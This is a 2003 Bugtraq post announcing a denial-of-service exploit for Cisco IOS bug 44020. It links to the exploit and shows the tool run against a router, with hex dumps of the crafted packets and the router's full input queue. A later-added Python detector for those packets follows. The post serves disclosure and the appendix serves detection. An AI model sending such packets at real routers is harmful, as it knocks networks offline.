[30825] in bugtraq


Cisco IOS exploit (44020)

daemon@ATHENA.MIT.EDU (Martin Kluge)
Mon Jul 21 12:53:02 2003

Date: Mon, 21 Jul 2003 18:01:32 +0200
From: Martin Kluge <martin@elxsi.de>
To: bugtraq@securityfocus.com
Message-ID: <20030721160132.GA61689@elxsi.de>

Hi,

I'd like to submit a DoS attack against the recently found bug in
almost all Cisco IOS versions (Cisco document ID 44020).

The exploit can be found here (and it is included as attachment):

http://www.elxsi.de/cisco-bug-44020.tar.gz


This exploit is NOT broken (like the shadowchode.tar.gz exploit for example):

Example:

bash-2.05b# telnet 192.168.1.123
Trying 192.168.1.123...
Connected to 192.168.1.123.
Escape character is '^]'.


User Access Verification

Username: 103
Password: ******


1003>show version
IOS (tm) 1000 Software (C1000-BNSY56-M), Version 12.0(22), RELEASE SOFTWARE (fc1)
Copyright (c) 1986-2002 by cisco Systems, Inc.
Compiled Mon 01-Apr-02 19:36 by srani
Image text-base: 0x02004000, data-base: 0x0259733C

ROM: System Bootstrap, Version 5.3.2(9) [vatran 9], RELEASE SOFTWARE (fc1)
BOOTFLASH: 1000 Bootstrap Software (C1000-RBOOT-R), Version 10.3(9), RELEASE SOFTWARE (fc1)

1003 uptime is 6 minutes
System restarted by power-on
System image file is "flash:c1000-bnsy56-mz.120-22.bin"

cisco 1000 (68360) processor (revision D) with 15872K/512K bytes of memory.
Processor board ID 03305903
Bridging software.
X.25 software, Version 3.0.0.
Basic Rate ISDN software, Version 1.1.
1 Ethernet/IEEE 802.3 interface(s)
1 ISDN Basic Rate interface(s)
7K bytes of non-volatile configuration memory.

bash-2.05b#./cisco-bug-44020 192.168.1.1 192.168.1.123 1 0
DEBUG: Hops: 1
DEBUG: Protocol: 53
DEBUG: Checksum: 47299
DEBUG:  45 10 00 14 32 20 40 00 01 35 c3 b8 c0 a8 01 01 c0 a8 01 7b
DEBUG: Wrote 20 bytes.
DEBUG: Protocol: 55
DEBUG: Checksum: 61909
DEBUG:  45 10 00 14 1f e5 40 00 01 37 d5 f1 c0 a8 01 01 c0 a8 01 7b
DEBUG: Wrote 20 bytes.
DEBUG: Protocol: 55
DEBUG: Checksum: 55515
DEBUG:  45 10 00 14 19 fe 40 00 01 37 db d8 c0 a8 01 01 c0 a8 01 7b
DEBUG: Wrote 20 bytes.
DEBUG: Protocol: 53
DEBUG: Checksum: 10618
DEBUG:  45 10 00 14 7b af 40 00 01 35 7a 29 c0 a8 01 01 c0 a8 01 7b
DEBUG: Wrote 20 bytes.
DEBUG: Protocol: 77
DEBUG: Checksum: 40137
DEBUG:  45 10 00 14 2c 24 40 00 01 4d c9 9c c0 a8 01 01 c0 a8 01 7b
DEBUG: Wrote 20 bytes.
<snip>
...
<snip>
bash-2.05b# telnet 192.168.1.123
Trying 192.168.1.123...
telnet: Unable to connect to remote host: No route to host

If I login via term, I can see the following:

Press RETURN to get started!


00:00:30: %LINK-3-UPDOWN: Interface Ethernet0, changed state to up
00:00:32: %LINEPROTO-5-UPDOWN: Line protocol on Interface Ethernet0, changed stp
00:00:35: %LINEPROTO-5-UPDOWN: Line protocol on Interface BRI0:1, changed staten
00:00:35: %LINEPROTO-5-UPDOWN: Line protocol on Interface BRI0:2, changed staten
00:00:39: %SYS-5-CONFIG_I: Configured from memory by console
00:00:39: %SYS-5-RESTART: System restarted --
Cisco Internetwork Operating System Software
IOS (tm) 1000 Software (C1000-BNSY56-M), Version 12.0(22), RELEASE SOFTWARE (fc)
Copyright (c) 1986-2002 by cisco Systems, Inc.
Compiled Mon 01-Apr-02 19:36 by srani
00:00:40: %LINK-3-UPDOWN: Interface BRI0, changed state to up
1003>en
Password: ******
1003#show Interfaces Ethernet 0
Ethernet0 is up, line protocol is up
  Hardware is QUICC Ethernet, address is 0060.7062.5727 (bia 0060.7062.5727)
  Internet address is 192.168.1.123/24
  MTU 1500 bytes, BW 10000 Kbit, DLY 1000 usec, rely 255/255, load 1/255
  Encapsulation ARPA, loopback not set, keepalive set (10 sec)
  ARP type: ARPA, ARP Timeout 04:00:00
  Last input 00:02:04, output 00:00:04, output hang never
  Last clearing of "show interface" counters never
  Input queue: 75/75/0/0 (size/max/drops/flushes); Total output drops: 0
               ^^
               ||
               The input queue is full :)


Cheers,
Martin Kluge
-- 
Name      : Martin Kluge
email     : martin@elxsi.info
Phone     : +49 160 1515182
Projects  : http://www.aa-security.de
GPG Key   : http://www.elxsi.de/key.pub
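
A defender-side check built from the values visible in this post, added here as an example (it is not part of the original message or its attachment): it flags IPv4 headers carrying the protocol numbers and TTL seen in the DEBUG lines, and recognises the full input queue in `show interfaces` output. The function names and the TTL <= 1 threshold are assumptions of this example.

```python
import re
import socket
import struct

# Protocol numbers that appear in the DEBUG lines of the post.
SUSPECT_PROTOCOLS = {53, 55, 77}

def checksum_ok(header: bytes) -> bool:
    """IPv4 header checksum: the folded 16-bit one's-complement sum is 0xFFFF."""
    total = sum(struct.unpack("!%dH" % (len(header) // 2), header))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return total == 0xFFFF

def classify_header(raw: bytes):
    """Return (src, dst, protocol, ttl) for a matching header, else None."""
    if len(raw) < 20 or raw[0] >> 4 != 4:
        return None                      # not IPv4, or truncated
    ihl = (raw[0] & 0x0F) * 4
    if ihl < 20 or len(raw) < ihl or not checksum_ok(raw[:ihl]):
        return None                      # malformed header, ignore
    ttl, proto = raw[8], raw[9]
    if proto not in SUSPECT_PROTOCOLS or ttl > 1:   # assumption: TTL <= 1, as in the dumps
        return None
    return (socket.inet_ntoa(raw[12:16]), socket.inet_ntoa(raw[16:20]), proto, ttl)

QUEUE_RE = re.compile(r"Input queue:\s*(\d+)/(\d+)/")

def input_queue_full(show_interface_text: str) -> bool:
    """True when 'Input queue: size/max/...' reports size >= max."""
    m = QUEUE_RE.search(show_interface_text)
    return bool(m) and int(m.group(2)) > 0 and int(m.group(1)) >= int(m.group(2))

# Headers copied from the DEBUG lines in the post.
PAGE_HEADERS = [bytes.fromhex(h) for h in (
    "45 10 00 14 32 20 40 00 01 35 c3 b8 c0 a8 01 01 c0 a8 01 7b",
    "45 10 00 14 1f e5 40 00 01 37 d5 f1 c0 a8 01 01 c0 a8 01 7b",
    "45 10 00 14 2c 24 40 00 01 4d c9 9c c0 a8 01 01 c0 a8 01 7b",
)]
# Constructed benign header: TCP (protocol 6), TTL 64, same addresses.
BENIGN = bytes.fromhex("45 00 00 14 00 00 40 00 40 06 b7 17 c0 a8 01 01 c0 a8 01 7b")

if __name__ == "__main__":
    for hdr in PAGE_HEADERS + [BENIGN]:
        print(classify_header(hdr))
    print(input_queue_full("Input queue: 75/75/0/0 (size/max/drops/flushes)"))
```
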